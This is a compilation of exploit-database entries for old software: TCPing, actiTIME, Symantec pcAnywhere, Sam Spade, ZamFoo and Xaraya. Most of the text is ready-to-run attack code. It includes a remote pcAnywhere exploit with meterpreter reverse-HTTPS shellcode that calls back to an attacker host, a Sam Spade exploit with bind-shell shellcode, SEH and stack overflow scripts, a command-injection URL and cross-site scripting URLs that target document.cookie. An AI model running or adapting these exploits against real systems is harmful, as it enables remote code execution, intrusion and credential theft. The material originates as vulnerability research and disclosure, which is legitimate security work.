TCPing "pings" a server on a specific port using TCP/IP by opening and
closing a
connection on the specified port. Results are returned in a similar fashion
to that
of Microsoft Windows Ping. This application is intended for use in testing
for open
ports on remote machines, or as an alternative to the standard "ping" in a
case
where ICMP packets are blocked or ignored.


Vulnerability Type:
===================
Buffer Overflow


CVE Reference:
==============
N/A


Vulnerability Details:
=====================

If TCPing is called with an specially crafted CL argument we will cause
exception and overwrite
the Pointers to next SEH record and SEH handler with our buffer and
malicious shellcode.
No suitable POP POP RET address is avail in TCPing as they start with null
bytes 0x00 and will
break our shellcode. However, TCPing is not compiled with SafeSEH which is
a linker option, so we
can grab an address from another module that performs POP POP RET
instructions to acheive
arbitrary code execution on victims system.


stack dump...


EAX 00000045
ECX 0040A750 tcping.0040A750
EDX 41414141
EBX 000002CC
ESP 0018FA50
EBP 0018FA50
ESI 0018FD21 ASCII "rror: Unknown host AAAAAA....
EDI 0018FCC8
EIP 0040270A tcping.0040270A
C 0  ES 002B 32bit 0(FFFFFFFF)
P 1  CS 0023 32bit 0(FFFFFFFF)
A 1  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr WSANO_DATA (00002AFC)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)


WinDBG dump...


(17a8.149c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for
image00400000
eax=00000045 ebx=00000222 ecx=0040a750 edx=41414141 esi=0018fd21
edi=0018fcc8
eip=0040270a esp=0018fa50 ebp=0018fa50 iopl=0         nv up ei pl nz ac pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010216
image00400000+0x270a:
0040270a 8802            mov     byte ptr [edx],al
 ds:002b:41414141=??


Exploit code(s):
===============

Python script...
'''

import struct,os,subprocess

#Spetnik TCPing Utility 2.1.0
#buffer overflow SEH exploit
#by hyp3rlinx


#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\\tcping.exe "

nseh="\xEB\x06"+"\x90"*2                          #JMP TO OUR SHELLCODE

seh=struct.pack('<L', 0x77214f99)                 #POP POP RET

payload="A"*580+nseh+seh+sc+"\x90"*20             #BOOOOOOOM!

subprocess.Popen([vulnpgm, payload], shell=False)


'''
Exploitation Technique:
=======================
Local


Severity Level:
=========================================================
High


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
'''
HireHackking 

actiTIME 2015.2 Multiple Vulnerabilities


Vendor: Actimind, Inc.
Product web page: http://www.actitime.com
Affected version: 2015.2 (Small Team Edition)

Summary: actiTIME is a web timesheet software. It allows you to
enter time spent on different work assignments, register time offs
and sick leaves, and then create detailed reports covering almost
any management or accounting needs.

Desc: The application suffers from multiple security vulnerabilities
including: Open Redirection, HTTP Response Splitting and Unquoted
Service Path Elevation Of Privilege.

Tested on: OS/Platform:	Windows 7 6.1 for x86
           Servlet Container: Jetty/5.1.4
           Servlet API Version: 2.4
           Java: 1.7.0_76-b13
           Database: MySQL 5.1.72-community-log
           Driver: MySQL-AB JDBC Driver mysql-connector-java-5.1.13
           Patch level: 28.0


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5273
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5273.php


13.10.2015

--



1. Open Redirect
-----------------

http://localhost/administration/settings.do?redirectUrl=http://zeroscience.mk&submitted=1


2. HTTP Response Splitting
---------------------------

http://localhost/administration/settings.do?redirectUrl=%0a%0dServer%3a%20Waddup%2f2%2e0&submitted=1

Response:

HTTP/1.1 302 Moved Temporarily
Date: Wed, 14 Oct 2015 09:32:05 GMT
Server: Jetty/5.1.4 (Windows 7/6.1 x86 java/1.7.0_76
Content-Type: text/html;charset=UTF-8
Cache-Control: no-store, no-cache
Pragma: no-cache
Expires: Tue, 09 Sep 2014 09:32:05 GMT
X-UA-Compatible: IE=Edge
Location: http://localhost/administration/
Server: Waddup/2.0
Content-Length: 0


3. Unquoted Service Path Elevation Of Privilege
------------------------------------------------

C:\Users\joxy>sc qc actiTIME
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: actiTIME
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\actiTIME\actitime_access.exe startAsService
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : actiTIME Server
        DEPENDENCIES       : actiTIME MySQL
        SERVICE_START_NAME : LocalSystem
HireHackking 
#!/usr/bin/python

################################################################
# Exploit Title: Symantec pcAnywhere v12.5.0 Windows x86 RCE
# Date: 2015-10-31
# Exploit Author: Tomislav Paskalev
# Vendor Homepage: https://www.symantec.com/
# Software Link: http://esdownload.symantec.com/akdlm/CD/MTV/pcAnywhere_12_5_MarketingTrialware.exe
#   Version: Symantec pcAnywhere v12.5.0 Build 442 (Trial)
# Vulnerable Software:
#   Symantec pcAnywhere 12.5.x through 12.5.3
#   Symantec IT Management Suite pcAnywhere Solution 7.0 (aka 12.5.x) and 7.1 (aka 12.6.x)
# Tested on:
#   Symantec pcAnywhere v12.5.0 Build 442 (Trial)
#   --------------------------------------------
#   Microsoft Windows Vista Ultimate SP1 x86 EN
#   Microsoft Windows Vista Ultimate SP2 x86 EN
#   Microsoft Windows 2008 Enterprise SP2 x86 EN
#   Microsoft Windows 7 Professional SP1 x86 EN
#   Microsoft Windows 7 Ultimate SP1 x86 EN
# CVE ID: 2011-3478
# OSVDB-ID: 78532
################################################################
# Vulnerability description:
#   The application's module used for handling incoming connections
#   (awhost32.exe) contains a flaw. When handling authentication
#   requests, the vulnerable process copies user provided input
#   to a fixed length buffer without performing a length check.
#   A remote unauthenticated attacker can exploit this vulnerability
#   to cause a buffer overflow and execute arbitrary code in the
#   context of the exploited application (installed as a service
#   by default, i.e. with "NT AUTHORITY\SYSTEM" privileges).
################################################################
# Target application notes:
#   - the application processes one login attempt at a time
#     (i.e. multiple parallel login requests are not possible)
#   - available modules (interesting exploit wise):
#     Name         | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll
#    -------------------------------------------------------------
#     awhost32.exe | False  | False   | False |  False   | False
#     ijl20.dll    | False  | False   | False |  False   | False
#     IMPLODE.DLL  | False  | False   | False |  False   | False
#    -------------------------------------------------------------
#   - supported Windows x86 operating systems (pcAnywhere v12.5)
#       - Windows 2000
#       - Windows 2003 Server
#       - Windows 2008 Server
#       - Windows XP
#       - Windows Vista
#       - Windows 7
################################################################
# Exploit notes:
#   - bad characters: "\x00"
#   - Windows Vista, Windows 2008 Server, Windows 7
#     - after a shellcode execution event occurs, the
#       application does not crash and remains fully functional
#       - one successful shellcode execution event has a low
#         success rate (applies to all OSes)
#         - in order to achieve an overall more reliable exploit,
#           multiple shellcode executions need to be performed
#           (until the shellcode is successfully executed)
#           - brute force is a feasible method 
#             - multiple parallel brute force attacks are not possible
#   - multiple valid offsets are available (i.e. not just the
#     ones tested)
################################################################
# Test notes:
#   - all tested OSes
#     - clean default installations
#   - all OS specific statistics referenced in the exploit are
#     based on the test results of 10 attempts per tested offset
#     - all attempts were performed after a system reboot (VM)
#     - the provided test results should be taken only as a rough guide
#       - in practice it might occur that the number of attempts
#         needed to achieve successful exploitation is (much)
#         higher than the maximum value contained in the test
#         results, or that the exploit does not succeed at all
#         - other (untested) offsets might provide better results
#   - not letting the OS and application load fully/properly before
#     starting the exploit may lead to failed exploitation (this
#     observation was made during the testing of the exploit and
#     applies mostly to Windows 7)
################################################################
# Patch:
#   https://support.symantec.com/en_US/article.TECH179526.html
#   https://support.norton.com/sp/en/us/home/current/solutions/v78694006_EndUserProfile_en_us
################################################################
# Thanks to:
#   Tal zeltzer (discovered the vulnerability)
#   S2 Crew (Python PoC)
################################################################
# In memoriam:
#   msfpayload | msfencode  [2005 - 2015]
################################################################
# References:
#   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3478
#   http://www.zerodayinitiative.com/advisories/ZDI-12-018/
#   https://www.exploit-db.com/exploits/19407/
################################################################


import socket
import time
import struct
import string
import sys




################################
###  HARDCODED TARGET INFO   ###
################################


# target server info
# >>> MODIFY THIS >>>
targetServer = "192.168.80.227"
targetPort   = 5631


# Supported operating systems
vistaUltSP1  = {
    'Version': 'Microsoft Windows Vista Ultimate SP1 x86 EN',
    'Offset': 0x03e60000,
    'PasswordStringLength': 3500,
    'TestAttempts': [8, 62, 35, 13, 8, 7, 11, 23, 8, 10]
};
vistaUltSP2  = {
    'Version': 'Microsoft Windows Vista Ultimate SP2 x86 EN',
    'Offset': 0x03e60000,
    'PasswordStringLength': 3500,
    'TestAttempts': [16, 27, 13, 17, 4, 13, 7, 9, 5, 16]
};
s2k8EntSP2   = {
    'Version': 'Microsoft Windows 2008 Enterprise SP2 x86 EN',
    'Offset': 0x03dd0000,
    'PasswordStringLength': 3500,
    'TestAttempts': [25, 5, 14, 18, 66, 7, 8, 4, 4, 24]
};
sevenProSP1  = {
    'Version': 'Microsoft Windows 7 Professional SP1 x86 EN',
    'Offset': 0x03a70000,
    'PasswordStringLength': 3500,
    'TestAttempts': [188, 65, 25, 191, 268, 61, 127, 136, 18, 98]
};
sevenUltSP1  = {
    'Version': 'Microsoft Windows 7 Ultimate SP1 x86 EN',
    'Offset': 0x03fa0000,
    'PasswordStringLength': 3500,
    'TestAttempts': [23, 49, 98, 28, 4, 31, 4, 42, 50, 42]
};


# target server OS
# >>> MODIFY THIS >>>
#OSdictionary = vistaUltSP1
#OSdictionary = vistaUltSP2
#OSdictionary = s2k8EntSP2
#OSdictionary = sevenProSP1
OSdictionary = sevenUltSP1


# timeout values
shellcodeExecutionTimeout = 30


# client-server handshake
initialisationSequence = "\x00\x00\x00\x00"
handshakeSequence      = "\x0d\x06\xfe"


# username string
usernameString         = "U" * 175


# shellcode
# available shellcode space: 1289 bytes
# shellcode generated with Metasploit Framework Version: 4.11.4-2015090201 (Kali 2.0)
# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=192.168.80.223 LPORT=443 EXITFUNC=seh -e x86/shikata_ga_nai -b '\x00' -f python -v shellcode
# >>> MODIFY THIS >>>
shellcode =  ""
shellcode += "\xda\xd3\xd9\x74\x24\xf4\xbf\x2c\x46\x39\x97\x5d"
shellcode += "\x33\xc9\xb1\x87\x83\xed\xfc\x31\x7d\x14\x03\x7d"
shellcode += "\x38\xa4\xcc\x6b\xa8\xaa\x2f\x94\x28\xcb\xa6\x71"
shellcode += "\x19\xcb\xdd\xf2\x09\xfb\x96\x57\xa5\x70\xfa\x43"
shellcode += "\x3e\xf4\xd3\x64\xf7\xb3\x05\x4a\x08\xef\x76\xcd"
shellcode += "\x8a\xf2\xaa\x2d\xb3\x3c\xbf\x2c\xf4\x21\x32\x7c"
shellcode += "\xad\x2e\xe1\x91\xda\x7b\x3a\x19\x90\x6a\x3a\xfe"
shellcode += "\x60\x8c\x6b\x51\xfb\xd7\xab\x53\x28\x6c\xe2\x4b"
shellcode += "\x2d\x49\xbc\xe0\x85\x25\x3f\x21\xd4\xc6\xec\x0c"
shellcode += "\xd9\x34\xec\x49\xdd\xa6\x9b\xa3\x1e\x5a\x9c\x77"
shellcode += "\x5d\x80\x29\x6c\xc5\x43\x89\x48\xf4\x80\x4c\x1a"
shellcode += "\xfa\x6d\x1a\x44\x1e\x73\xcf\xfe\x1a\xf8\xee\xd0"
shellcode += "\xab\xba\xd4\xf4\xf0\x19\x74\xac\x5c\xcf\x89\xae"
shellcode += "\x3f\xb0\x2f\xa4\xad\xa5\x5d\xe7\xb9\x57\x3b\x6c"
shellcode += "\x39\xc0\xb4\xe5\x57\x79\x6f\x9e\xeb\x0e\xa9\x59"
shellcode += "\x0c\x25\x84\xbe\xa1\x95\xb4\x13\x16\x72\x01\xc2"
shellcode += "\xe1\x25\x8a\x3f\x42\x79\x1f\xc3\x37\x2e\xb7\x78"
shellcode += "\xb6\xd0\x47\x97\x86\xd1\x47\x67\xd9\x84\x3f\x54"
shellcode += "\x6e\x11\x95\xaa\x3a\x37\x6f\xa8\xf7\xbe\xf8\x1d"
shellcode += "\x4c\x16\x73\x50\x25\xc2\x0c\xa6\x91\xc1\xb0\x8b"
shellcode += "\x53\x69\x76\x22\xd9\x46\x0a\x1a\xbc\xea\x87\xf9"
shellcode += "\x09\xb2\x10\xcf\x14\x3c\xd0\x56\xb3\xc8\xba\xe0"
shellcode += "\x69\x5a\x3a\xa2\xff\xf0\xf2\x73\x92\x4b\x79\x10"
shellcode += "\x02\x3f\x4f\xdc\x8f\xdb\xe7\x4f\x6d\x1d\xa9\x1d"
shellcode += "\x42\x0c\x70\x80\xcc\xe9\xe5\x0a\x55\x80\x8a\xc2"
shellcode += "\x3d\x2a\x2f\xa5\xe2\xf1\xfe\x7d\x2a\x86\x6b\x08"
shellcode += "\x27\x33\x2a\xbb\xbf\xf9\xd9\x7a\x7d\x87\x4f\x10"
shellcode += "\xed\x0d\x1b\xad\x88\xc6\xb8\x50\x07\x6a\x74\xf1"
shellcode += "\xd3\x2d\xd9\x84\x4e\xc0\x8e\x25\x23\x76\x60\xc9"
shellcode += "\xb4\xd9\xf5\x64\x0e\x8e\xa6\x22\x05\x39\x3f\x98"
shellcode += "\x96\x8e\xca\x4f\x79\x54\x64\x26\x33\x3d\xe7\xaa"
shellcode += "\xa2\xb1\x90\x59\x4b\x74\x1a\xce\xf9\x0a\xc6\xd8"
shellcode += "\xcc\x99\x49\x75\x47\x33\x0e\x1c\xd5\xf9\xde\xad"
shellcode += "\xa3\x8c\x1e\x02\x3b\x38\x96\x3d\x7d\x39\x7d\xc8"
shellcode += "\x47\x95\x16\xcb\x75\xfa\x63\x98\x2a\xa9\x3c\x4c"
shellcode += "\x9a\x25\x28\x27\x0c\x8d\x51\x1d\xc6\x9b\xa7\xc1"
shellcode += "\x8e\xdb\x8b\xfd\x4e\x55\x0b\x97\x4a\x35\xa6\x77"
shellcode += "\x04\xdd\x43\xce\x36\x9b\x53\x1b\x15\xf7\xf8\xf7"
shellcode += "\xcf\x9f\xd3\xf1\xf7\x24\xd3\x2b\x82\x1b\x5e\xdc"
shellcode += "\xc3\xee\x78\x34\x90\x10\x7b\xc5\x4c\x51\x13\xc5"
shellcode += "\x80\x51\xe3\xad\xa0\x51\xa3\x2d\xf3\x39\x7b\x8a"
shellcode += "\xa0\x5c\x84\x07\xd5\xcc\x28\x21\x3e\xa5\xa6\x31"
shellcode += "\xe0\x4a\x37\x61\xb6\x22\x25\x13\xbf\x51\xb6\xce"
shellcode += "\x3a\x55\x3d\x3e\xcf\x51\xbf\x03\x4a\x9d\xca\x66"
shellcode += "\x0c\xdd\x6a\x81\xdb\x1e\x6b\xae\x12\xd8\xa6\x7f"
shellcode += "\x65\x2c\xff\x51\xbd\x60\xd1\x9f\x8f\xb3\x2d\x5b"
shellcode += "\x11\xbd\x1f\x71\x87\xc2\x0c\x7a\x82\xa9\xb2\x47"




################################
###     BUFFER OVERFLOW      ###
###   STRING CONSTRUCTION    ###
################################


# Calculate address values based on the OS offset
pointerLocationAddress    = OSdictionary['Offset'] + 0x00005ad8
pointerForECXplus8Address = OSdictionary['Offset'] + 0x00005ad4
breakPointAddress         = OSdictionary['Offset'] + 0x000065af - 0x00010000


# jump over the next 38 bytes (to the begining of the shellcode)
jumpToShellcode    = "\xeb\x26\x90\x90"

# pointerLocationAddress - the memory address location of the "pointerForECXplus8" variable
pointerLocation    = struct.pack('<L', pointerLocationAddress)

# CALL ESI from the application module ijl20.dll [aslr=false,rebase=false,safeseh=false]
callESI            = struct.pack('<L', 0x67f7ab23)

# pointerForECXplus8Address - the memory address location of the start of the DDDD string in the shellcode (Offset + 0x00005acc + 0x8)
pointerForECXplus8 = struct.pack('<L', pointerForECXplus8Address)


# construct the password string which will cause a buffer overflow condition and exploit the vulnerability
passwordString = (
    "A" * 945 +
    jumpToShellcode +
    pointerLocation +
    "D" * 4 +
    pointerForECXplus8 +
    callESI +
    "\x90" * 20 +
    shellcode +
    "I" * (1289 - len(shellcode)) +
    "\xaa" * (OSdictionary['PasswordStringLength'] - 945 - 4 * 5 - 20 - 1289)
)




################################
###        FUNCTIONS         ###
################################


# calculate and return the median value of the argument list
def calculateMedian(targetList):
    sortedTargetList = sorted(targetList)
    targetListLength = len(targetList)
    medianIndex = (targetListLength - 1) / 2

    if (targetListLength % 2):
        return sortedTargetList[medianIndex]
    else:
        return ((sortedTargetList[medianIndex] + sortedTargetList[medianIndex + 1]) / 2)



# print an indented line with a type prefix
def printLine(infoType, indentDepth, textToDisplay):

    # [I]nformational
    if infoType == "I":
        print ('    ' * indentDepth),
        print "\033[1;37m[*]\033[1;m", textToDisplay

    # [E]rror
    elif infoType == "E":
        print ('    ' * indentDepth),
        print "\033[1;31m[-]\033[1;m", textToDisplay

    # [S]uccess
    elif infoType == "S":
        print ('    ' * indentDepth),
        print "\033[1;32m[+]\033[1;m", textToDisplay

    # [W]arning
    elif infoType == "W":
        print ('    ' * indentDepth),
        print "\033[1;33m[!]\033[1;m", textToDisplay

    # [N]one
    elif infoType == "N":
        print ('    ' * indentDepth),
        print textToDisplay



# print the banner - general exploit info, target info, target OS statistics
def printBanner():
    printLine ("I", 0, "Symantec pcAnywhere v12.5.0 Build 442 Login+Password field")
    printLine ("N", 1, "Buffer Overflow Remote Code Execution exploit (CVE-2011-3478)")
    printLine ("I", 1, "by Tomislav Paskalev")

    printLine ("I", 0, "Target server information")
    printLine ("I", 1, "IP address            : " + targetServer)
    printLine ("I", 1, "Port                  : " + str(targetPort))

    printLine ("I", 0, "Exploit target information")
    printLine ("I", 1, "Target OS             : " + OSdictionary['Version'])
    printLine ("I", 2, "Offset            : " + "{:#010x}".format(OSdictionary['Offset']))
    printLine ("I", 2, "Breakpoint (test) : " + "{:#010x}".format(breakPointAddress))
    printLine ("I", 2, "Password length   : " + str(OSdictionary['PasswordStringLength']))
    printLine ("I", 2, "Test result stats")
    printLine ("I", 3, "Test count    : " + str(len(OSdictionary['TestAttempts'])))
    printLine ("I", 3, "Reliability   : " + str(((len(OSdictionary['TestAttempts']) - OSdictionary['TestAttempts'].count(0)) * 100) / len(OSdictionary['TestAttempts'])) + "%")
    printLine ("I", 3, "Min attempt   : " + str(min([element for element in OSdictionary['TestAttempts'] if element > 0])))
    printLine ("I", 3, "Max attempt   : " + str(max(OSdictionary['TestAttempts'])))
    printLine ("I", 3, "Avg attempt   : " + str(sum(OSdictionary['TestAttempts']) / len(OSdictionary['TestAttempts'])))
    printLine ("I", 3, "Median attempt: " + str(calculateMedian(OSdictionary['TestAttempts'])))



# connect to the server and return the socket
def connectToServer(server, port):
    # create socket
    targetSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        targetSocket.connect((server, port))
    except socket.error as msg:
        if "[Errno 111] Connection refused" in str(msg):
            return None
    # return the opened socket
    return targetSocket



# send the data to the server and return the response
def sendDataToServer(destSocket, dataToSend):
    destSocket.send(dataToSend)
    try:
        receivedData = destSocket.recv(1024)
    except socket.error as msg:
        if "[Errno 104] Connection reset by peer" in str(msg):
            return None
    return receivedData



# run the exploit; exits when finished or interrupted
def runExploit():
    printLine ("I", 0, "Starting exploit...")

    attemptCounter = 0

    # brute force the service until the shellcode is successfully executed
    while True:
        # connect to the target server
        openSocket = connectToServer(targetServer, targetPort)

        attemptCounter += 1
        sleepTimer = 0

        printLine ("I", 1, "Attempt no. " + str(attemptCounter))
        printLine ("I", 2, "Sending initialisation sequence...")

        # send the data; check outcome
        while True:
            receivedData = sendDataToServer(openSocket, initialisationSequence)
            # check if server responded properly, if yes exit the loop
            if receivedData:
                if "Please press <Enter>..." in receivedData:
                    break
            # exit if the service is unavailable
            if attemptCounter == 1:
                printLine ("E", 3, "Service unavailable")
                printLine ("I", 4, "Exiting...")
                exit(1)
            # check if shellcode executed (based on a timer)
            if sleepTimer > shellcodeExecutionTimeout:
                print ""
                printLine ("S", 4, "Shellcode executed after " + str(attemptCounter - 1) + " attempts")
                printLine ("I", 5, "Exiting...")
                exit(1)

            # print waiting ticks
            sys.stdout.write('\r')
            sys.stdout.write("             \033[1;33m[!]\033[1;m Connection reset - reinitialising%s" % ('.' * sleepTimer))
            sys.stdout.flush()

            # sleep one second and reconnect
            time.sleep(1)
            sleepTimer += 1

            openSocket.close()
            openSocket = connectToServer(targetServer, targetPort)

        if sleepTimer > 0:
            print ""

        printLine ("I", 2, "Sending handshake sequence...")
        openSocket.send(handshakeSequence)
        time.sleep(3)
        data = openSocket.recv(1024)
 
        printLine ("I", 2, "Sending username...")
        openSocket.send(usernameString)
        time.sleep(3)
 
        printLine ("I", 2, "Sending password...")
        openSocket.send(passwordString)
        openSocket.close()
        time.sleep(3)



# main function
if __name__ == "__main__":
    printBanner()
    try:
        runExploit()
    except KeyboardInterrupt:
        print ""
        sys.exit()


# End of file
HireHackking 
#!/usr/bin/python 
# -*- coding: cp1252 -*-
# EXPLOIT TITLE: Sam Spade 1.14 Scan from IP address Field Exploit
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Luis Mart�nez
# Date of Testing: 2nd November 2015
# Download Link : https://www.exploit-db.com/apps/7ad7569341d685b4760ba4adecab6def-spade114.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called buffer.txt
# Step 3: Copy the contents of buffer.txt file
# Step 4: Now open Sam Spade 1.14 
# Step 5: Go To 'Tools' > 'Scan Addresses...' 
# Step 6: Paste the contents in 'Scan from IP addresses' input field 
# Step 7: Connect to the target at port 4444 with ncat/nc 




file = open('buffer.txt' , 'wb');

buffer = "A"*507 + "\x9f\x43\x30\x5d"  #JMP ESP 
buffer += "\x90"*20

# msfvenom  -p windows/shell_bind_tcp -f c -b "\x00\x0a\x0d\x20\x0b\x0c"

buffer += ("\xba\x72\x30\xbb\xe7\xdd\xc1\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x53\x31\x50\x12\x83\xc0\x04\x03\x22\x3e\x59\x12\x3e\xd6\x1f"
"\xdd\xbe\x27\x40\x57\x5b\x16\x40\x03\x28\x09\x70\x47\x7c\xa6"
"\xfb\x05\x94\x3d\x89\x81\x9b\xf6\x24\xf4\x92\x07\x14\xc4\xb5"
"\x8b\x67\x19\x15\xb5\xa7\x6c\x54\xf2\xda\x9d\x04\xab\x91\x30"
"\xb8\xd8\xec\x88\x33\x92\xe1\x88\xa0\x63\x03\xb8\x77\xff\x5a"
"\x1a\x76\x2c\xd7\x13\x60\x31\xd2\xea\x1b\x81\xa8\xec\xcd\xdb"
"\x51\x42\x30\xd4\xa3\x9a\x75\xd3\x5b\xe9\x8f\x27\xe1\xea\x54"
"\x55\x3d\x7e\x4e\xfd\xb6\xd8\xaa\xff\x1b\xbe\x39\xf3\xd0\xb4"
"\x65\x10\xe6\x19\x1e\x2c\x63\x9c\xf0\xa4\x37\xbb\xd4\xed\xec"
"\xa2\x4d\x48\x42\xda\x8d\x33\x3b\x7e\xc6\xde\x28\xf3\x85\xb6"
"\x9d\x3e\x35\x47\x8a\x49\x46\x75\x15\xe2\xc0\x35\xde\x2c\x17"
"\x39\xf5\x89\x87\xc4\xf6\xe9\x8e\x02\xa2\xb9\xb8\xa3\xcb\x51"
"\x38\x4b\x1e\xcf\x30\xea\xf1\xf2\xbd\x4c\xa2\xb2\x6d\x25\xa8"
"\x3c\x52\x55\xd3\x96\xfb\xfe\x2e\x19\x12\xa3\xa7\xff\x7e\x4b"
"\xee\xa8\x16\xa9\xd5\x60\x81\xd2\x3f\xd9\x25\x9a\x29\xde\x4a"
"\x1b\x7c\x48\xdc\x90\x93\x4c\xfd\xa6\xb9\xe4\x6a\x30\x37\x65"
"\xd9\xa0\x48\xac\x89\x41\xda\x2b\x49\x0f\xc7\xe3\x1e\x58\x39"
"\xfa\xca\x74\x60\x54\xe8\x84\xf4\x9f\xa8\x52\xc5\x1e\x31\x16"
"\x71\x05\x21\xee\x7a\x01\x15\xbe\x2c\xdf\xc3\x78\x87\x91\xbd"
"\xd2\x74\x78\x29\xa2\xb6\xbb\x2f\xab\x92\x4d\xcf\x1a\x4b\x08"
"\xf0\x93\x1b\x9c\x89\xc9\xbb\x63\x40\x4a\xcb\x29\xc8\xfb\x44"
"\xf4\x99\xb9\x08\x07\x74\xfd\x34\x84\x7c\x7e\xc3\x94\xf5\x7b"
"\x8f\x12\xe6\xf1\x80\xf6\x08\xa5\xa1\xd2")



file.write(buffer);
file.close()
HireHackking 
# Exploit Title     : Sam Spade 1.14 - Buffer OverFlow
# Date              : 10/30/2015
# Exploit Author    : MandawCoder
# Contact           : MandawCoder@gmail.com
# Vendor Homepage   : http://samspade.org
# Software Link     : http://www.majorgeeks.com/files/details/sam_spade.html
# Version           : 1.14
# Tested on         : XP Professional SP3 En x86
# Category          : Local Exploit
# Description:
# bug is on this section == Tools -> Crawl website...
# Execute following exploit, then delete "http://" from "CRAWL all URLs below" part, then paste the content of file.txt into mentioned section.
#
# this section(and other sections as well) also has SEH buffer overflow ... I would really appreciated if someone Exploit it.


f = open("file.txt", "w")

Junk = "A"*503

addr = "\x53\x93\x42\x7E"

space = "AAAA"

nop="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

# Shellcode:
# windows/exec - 277 bytes
# CMD=calc.exe
shellcode= ("\xba\x1c\xb4\xa5\xac\xda\xda\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x33\x31\x53\x12\x83\xeb\xfc\x03\x4f\xba\x47\x59\x93\x2a\x0e"
"\xa2\x6b\xab\x71\x2a\x8e\x9a\xa3\x48\xdb\x8f\x73\x1a\x89\x23"
"\xff\x4e\x39\xb7\x8d\x46\x4e\x70\x3b\xb1\x61\x81\x8d\x7d\x2d"
"\x41\x8f\x01\x2f\x96\x6f\x3b\xe0\xeb\x6e\x7c\x1c\x03\x22\xd5"
"\x6b\xb6\xd3\x52\x29\x0b\xd5\xb4\x26\x33\xad\xb1\xf8\xc0\x07"
"\xbb\x28\x78\x13\xf3\xd0\xf2\x7b\x24\xe1\xd7\x9f\x18\xa8\x5c"
"\x6b\xea\x2b\xb5\xa5\x13\x1a\xf9\x6a\x2a\x93\xf4\x73\x6a\x13"
"\xe7\x01\x80\x60\x9a\x11\x53\x1b\x40\x97\x46\xbb\x03\x0f\xa3"
"\x3a\xc7\xd6\x20\x30\xac\x9d\x6f\x54\x33\x71\x04\x60\xb8\x74"
"\xcb\xe1\xfa\x52\xcf\xaa\x59\xfa\x56\x16\x0f\x03\x88\xfe\xf0"
"\xa1\xc2\xec\xe5\xd0\x88\x7a\xfb\x51\xb7\xc3\xfb\x69\xb8\x63"
"\x94\x58\x33\xec\xe3\x64\x96\x49\x1b\x2f\xbb\xfb\xb4\xf6\x29"
"\xbe\xd8\x08\x84\xfc\xe4\x8a\x2d\x7c\x13\x92\x47\x79\x5f\x14"
"\xbb\xf3\xf0\xf1\xbb\xa0\xf1\xd3\xdf\x27\x62\xbf\x31\xc2\x02"
 "\x5a\x4e")

f.write(Junk + addr + space + nop + shellcode)

f.close()

print "Done"
HireHackking 
source: https://www.securityfocus.com/bid/60826/info

ZamFoo is prone to a remote command-injection vulnerability.

Attackers can exploit this issue to execute arbitrary commands in the context of the application.

ZamFoo 12.0 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command`
HireHackking 
source: https://www.securityfocus.com/bid/60795/info

Xaraya is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Xaraya 2.4.0-b1 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?func=modinfonew&id=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&module=modules&type=admin

http://www.example.com/index.php?block_id=7&func=modify_instance&interface=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&module=blocks&tab=config&type=admin

http://www.example.com/index.php?func=aliases&module=modules&name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&type=admin

http://www.example.com/index.php?func=assignprivileges&module=privileges&tab=authsystem&tabmodule=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3
HireHackking 
source: https://www.securityfocus.com/bid/60818/info

